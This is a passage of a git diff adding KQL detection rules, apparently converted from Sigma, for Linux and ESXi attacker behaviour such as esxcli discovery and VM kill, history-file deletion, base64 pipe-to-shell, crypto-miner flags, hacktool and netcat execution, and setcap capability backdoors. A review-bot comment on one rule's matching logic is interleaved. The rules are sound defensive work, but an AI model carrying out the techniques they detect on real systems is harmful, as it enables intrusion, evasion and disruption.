+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "network" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql
new file mode 100644
index 00000000..c4ad39af
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Storage Information Discovery Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "storage" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql
new file mode 100644
index 00000000..a3d551ad
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Syslog Configuration Change Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects changes to the ESXi syslog configuration via "esxcli"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1562.001, attack.t1562.003, attack.t1059.012
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " set" and (ProcessCommandLine contains "system" and ProcessCommandLine contains "syslog" and ProcessCommandLine contains "config") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql
new file mode 100644
index 00000000..a65b97ae
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi System Information Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "system" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql
new file mode 100644
index 00000000..d0f42b99
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi VM Kill Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.impact, attack.t1059.012, attack.t1529
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "vm process" and ProcessCommandLine contains "kill") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql
new file mode 100644
index 00000000..3d941723
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi VM List Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "vm process" and ProcessCommandLine endswith " list" and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql
new file mode 100644
index 00000000..ee53f7c0
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi VSAN Information Discovery Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "vsan" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql b/KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql
new file mode 100644
index 00000000..5567e7e9
--- /dev/null
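Review bot: `ProcessCommandLine endswith " list"` in the ESXi VM List Discovery hunk requires `list` to be the final token, so the rule stays silent whenever an option or formatter flag follows the subcommand, and a trailing space in the recorded command line could defeat it as well. The sibling esxcli discovery rules on this page (network, storage, system, vsan) express the same idea with `contains " list"`, so `ProcessCommandLine contains " list"` (or `ProcessCommandLine has "list"`) would be consistent with them. If the stricter form is deliberate, to avoid matching "vm process list" embedded in a longer script invocation, that reasoning belongs in a comment on the rule, e.g. `// Note: endswith is intentional; a bare "vm process list" is the expected form`.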
+++ b/KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql
@@ -0,0 +1,10 @@
+// Title: Execution Of Script Located In Potentially Suspicious Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql b/KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql
new file mode 100644
index 00000000..4877e734
--- /dev/null
+++ b/KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: File and Directory Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "(.){200,}" and FolderPath endswith "/file") or FolderPath endswith "/find" or FolderPath endswith "/findmnt" or FolderPath endswith "/mlocate" or (ProcessCommandLine contains "-R" and FolderPath endswith "/ls") or FolderPath endswith "/tree"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/file_deletion.kql b/KQL/rules/linux/process_creation/file_deletion.kql
new file mode 100644
index 00000000..8bd86d21
--- /dev/null
+++ b/KQL/rules/linux/process_creation/file_deletion.kql
@@ -0,0 +1,12 @@
+// Title: File Deletion
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-07
+// Level: informational
+// Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql b/KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql
new file mode 100644
index 00000000..10a4fa07
--- /dev/null
+++ b/KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql
@@ -0,0 +1,12 @@
+// Title: Flush Iptables Ufw Chain
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-18
+// Level: medium
+// Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Network administrators
+
+DeviceProcessEvents
+| where (FolderPath endswith "/iptables" or FolderPath endswith "/xtables-legacy-multi" or FolderPath endswith "/iptables-legacy-multi" or FolderPath endswith "/ip6tables" or FolderPath endswith "/ip6tables-legacy-multi") and (ProcessCommandLine contains "-F" or ProcessCommandLine contains "-Z" or ProcessCommandLine contains "-X") and (ProcessCommandLine contains "ufw-logging-deny" or ProcessCommandLine contains "ufw-logging-allow" or ProcessCommandLine contains "ufw6-logging-deny" or ProcessCommandLine contains "ufw6-logging-allow")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql b/KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql
new file mode 100644
index 00000000..eac52baa
--- /dev/null
+++ b/KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql
@@ -0,0 +1,12 @@
+// Title: Group Has Been Deleted Via Groupdel
+// Author: Tuan Le (NCSGroup)
+// Date: 2022-12-26
+// Level: medium
+// Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1531
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/groupdel"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/history_file_deletion.kql b/KQL/rules/linux/process_creation/history_file_deletion.kql
new file mode 100644
index 00000000..f9f30c29
--- /dev/null
+++ b/KQL/rules/linux/process_creation/history_file_deletion.kql
@@ -0,0 +1,12 @@
+// Title: History File Deletion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: high
+// Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1565.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql
new file mode 100644
index 00000000..a96b028d
--- /dev/null
+++ b/KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql
@@ -0,0 +1,10 @@
+// Title: Inline Python Execution - Spawn Shell Via OS System Library
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -c " and ProcessCommandLine contains "os.system(")) and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3."))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/install_root_certificate.kql b/KQL/rules/linux/process_creation/install_root_certificate.kql
new file mode 100644
index 00000000..353acf5a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/install_root_certificate.kql
@@ -0,0 +1,12 @@
+// Title: Install Root Certificate
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-05
+// Level: low
+// Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/update-ca-certificates" or FolderPath endswith "/update-ca-trust"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql b/KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql
new file mode 100644
index 00000000..f0c6cf48
--- /dev/null
+++ b/KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql
@@ -0,0 +1,12 @@
+// Title: Interactive Bash Suspicious Children
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-14
+// Level: medium
+// Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.004, attack.t1036
+// False Positives:
+// - Legitimate software that uses these patterns
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine =~ "bash -i" and ((ProcessCommandLine contains "-c import " or ProcessCommandLine contains "base64" or ProcessCommandLine contains "pty.spawn") or (FolderPath endswith "whoami" or FolderPath endswith "iptables" or FolderPath endswith "/ncat" or FolderPath endswith "/nc" or FolderPath endswith "/netcat"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
new file mode 100644
index 00000000..c4919eb8
--- /dev/null
+++ b/KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
@@ -0,0 +1,13 @@
+// Title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux
+// Author: Milad Cheraghi
+// Date: 2025-10-18
+// Level: high
+// Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.
+// This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - System administrator manually stopping Kaspersky services
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "stop" and ProcessCommandLine contains "kesl") and (FolderPath endswith "/systemctl" or FolderPath endswith "/bash" or FolderPath endswith "/sh")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql b/KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql
new file mode 100644
index 00000000..ff5fb23f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql
@@ -0,0 +1,12 @@
+// Title: Linux Base64 Encoded Pipe to Shell
+// Author: pH-T (Nextron Systems)
+// Date: 2022-07-26
+// Level: medium
+// Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "base64 " and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith " |sh" or ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql b/KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql
new file mode 100644
index 00000000..5039075a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql
@@ -0,0 +1,12 @@
+// Title: Linux Base64 Encoded Shebang In CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "IyEvYmluL2Jhc2" or ProcessCommandLine contains "IyEvYmluL2Rhc2" or ProcessCommandLine contains "IyEvYmluL3pza" or ProcessCommandLine contains "IyEvYmluL2Zpc2" or ProcessCommandLine contains "IyEvYmluL3No"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql b/KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql
new file mode 100644
index 00000000..159fa543
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Linux Crypto Mining Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects command line parameters or strings often used by crypto miners
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "sh -c /sbin/modprobe msr allow_writes=on" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_doas_tool_execution.kql b/KQL/rules/linux/process_creation/linux_doas_tool_execution.kql
new file mode 100644
index 00000000..ef61492e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_doas_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Linux Doas Tool Execution
+// Author: Sittikorn S, Teoderick Contreras
+// Date: 2022-01-20
+// Level: low
+// Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "/doas"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_hacktool_execution.kql b/KQL/rules/linux/process_creation/linux_hacktool_execution.kql
new file mode 100644
index 00000000..4a14b737
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_hacktool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Linux HackTool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
+// Date: 2023-01-03
+// Level: high
+// Description: Detects known hacktool execution based on image name.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.resource-development, attack.t1587
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath contains "/cobaltstrike" or FolderPath contains "/teamserver") or (FolderPath endswith "/crackmapexec" or FolderPath endswith "/havoc" or FolderPath endswith "/merlin-agent" or FolderPath endswith "/merlinServer-Linux-x64" or FolderPath endswith "/msfconsole" or FolderPath endswith "/msfvenom" or FolderPath endswith "/ps-empire server" or FolderPath endswith "/ps-empire" or FolderPath endswith "/sliver-client" or FolderPath endswith "/sliver-server" or FolderPath endswith "/Villain.py") or (FolderPath endswith "/aircrack-ng" or FolderPath endswith "/bloodhound-python" or FolderPath endswith "/bpfdos" or FolderPath endswith "/ebpfki" or FolderPath endswith "/evil-winrm" or FolderPath endswith "/hashcat" or FolderPath endswith "/hoaxshell.py" or FolderPath endswith "/hydra" or FolderPath endswith "/john" or FolderPath endswith "/ncrack" or FolderPath endswith "/nxc-ubuntu-latest" or FolderPath endswith "/pidhide" or FolderPath endswith "/pspy32" or FolderPath endswith "/pspy32s" or FolderPath endswith "/pspy64" or FolderPath endswith "/pspy64s" or FolderPath endswith "/setoolkit" or FolderPath endswith "/sqlmap" or FolderPath endswith "/writeblocker") or FolderPath contains "/linpeas" or (FolderPath endswith "/autorecon" or FolderPath endswith "/httpx" or FolderPath endswith "/legion" or FolderPath endswith "/naabu" or FolderPath endswith "/netdiscover" or FolderPath endswith "/nuclei" or FolderPath endswith "/recon-ng") or FolderPath contains "/sniper" or (FolderPath endswith "/dirb" or FolderPath endswith "/dirbuster" or FolderPath endswith "/eyewitness" or FolderPath endswith "/feroxbuster" or FolderPath endswith "/ffuf" or FolderPath endswith "/gobuster" or FolderPath endswith "/wfuzz" or FolderPath endswith "/whatweb") or (FolderPath endswith "/joomscan" or FolderPath endswith "/nikto" or FolderPath endswith "/wpscan")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql b/KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql
new file mode 100644
index 00000000..5862f1fe
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql
@@ -0,0 +1,12 @@
+// Title: Linux Network Service Scanning Tools Execution
+// Author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])
+// Date: 2020-10-21
+// Level: low
+// Description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/socat") and (not((ProcessCommandLine contains " --listen " or ProcessCommandLine contains " -l ")))) or (FolderPath endswith "/autorecon" or FolderPath endswith "/hping" or FolderPath endswith "/hping2" or FolderPath endswith "/hping3" or FolderPath endswith "/naabu" or FolderPath endswith "/nmap" or FolderPath endswith "/nping" or FolderPath endswith "/telnet" or FolderPath endswith "/zenmap")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_package_uninstall.kql b/KQL/rules/linux/process_creation/linux_package_uninstall.kql
new file mode 100644
index 00000000..458dd45e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_package_uninstall.kql
@@ -0,0 +1,12 @@
+// Title: Linux Package Uninstall
+// Author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: low
+// Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "remove" or ProcessCommandLine contains "purge") and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--remove " or ProcessCommandLine contains " -r ") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains " -e " and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "erase" or ProcessCommandLine contains "remove") and FolderPath endswith "/yum")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_recon_indicators.kql b/KQL/rules/linux/process_creation/linux_recon_indicators.kql
new file mode 100644
index 00000000..9be5ce4f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_recon_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Linux Recon Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: high
+// Description: Detects events with patterns found in commands used for reconnaissance on linux systems
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004, attack.credential-access, attack.t1552.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -name .htpasswd" or ProcessCommandLine contains " -perm -4000 "
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_remote_system_discovery.kql b/KQL/rules/linux/process_creation/linux_remote_system_discovery.kql
new file mode 100644
index 00000000..512b68b4
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_remote_system_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Linux Remote System Discovery
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-22
+// Level: low
+// Description: Detects the enumeration of other remote systems.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-a" and FolderPath endswith "/arp") or ((ProcessCommandLine contains " 10." or ProcessCommandLine contains " 192.168." or ProcessCommandLine contains " 172.16." or ProcessCommandLine contains " 172.17." or ProcessCommandLine contains " 172.18." or ProcessCommandLine contains " 172.19." or ProcessCommandLine contains " 172.20." or ProcessCommandLine contains " 172.21." or ProcessCommandLine contains " 172.22." or ProcessCommandLine contains " 172.23." or ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql b/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql
new file mode 100644
index 00000000..090fbbb5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql
@@ -0,0 +1,12 @@
+// Title: Linux Setgid Capability Set on a Binary via Setcap Utility
+// Author: Luc Génaux
+// Date: 2026-01-24
+// Level: low
+// Description: Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file.
+// This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group).
+// This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548, attack.t1554
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "cap_setgid" and FolderPath endswith "/setcap"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql b/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql
new file mode 100644
index 00000000..e8356003
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql
@@ -0,0 +1,12 @@
+// Title: Linux Setuid Capability Set on a Binary via Setcap Utility
+// Author: Luc Génaux
+// Date: 2026-01-24
+// Level: low
+// Description: Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file.
+// This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user).
+// This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548, attack.t1554
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "cap_setuid" and FolderPath endswith "/setcap"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql b/KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql
new file mode 100644
index 00000000..33a42a90
--- /dev/null
+++ b/KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql
@@ -0,0 +1,12 @@
+// Title: Linux Shell Pipe to Shell
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-14
+// Level: medium
+// Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
